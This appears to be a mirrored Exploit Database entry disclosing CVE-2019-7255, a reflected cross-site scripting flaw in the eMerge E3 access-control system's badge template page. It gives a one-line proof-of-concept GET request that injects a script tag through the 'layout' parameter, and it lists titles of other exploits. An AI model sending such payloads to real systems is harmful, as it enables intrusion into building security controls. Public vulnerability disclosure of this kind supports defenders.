eMerge E3 1.00-06 – ‘layout’ Reflected Cross-Site Scripting

Exploit Database
17 阅读

作者： LiquidWorm

日期： 2019-11-12
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/47623/

# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7255
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

# PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

last Exploits
eMerge E3 1.00-06 – ‘layout’ Reflected Cross-Site Scripting的更多信息

Telia Web Design – ‘index.php’ SQL Injection：
Shopy Point of Sale 1.0 – CSV Injection：
Web Professional – ‘default.php’ SQL Injection：
WordPress Theme RedLine 1.65 – ‘s’ Cross-Site Scripting：
Open-AudIT Community 2.2.6 – Cross-Site Scripting：
ClipBucket 2.8.3 – Remote Code Execution：
PHP-Nuke Module print 6.0 – ‘print&sid’ SQL Injection：
Auto-Exchanger 5.1.0 – Cross-Site Request Forgery：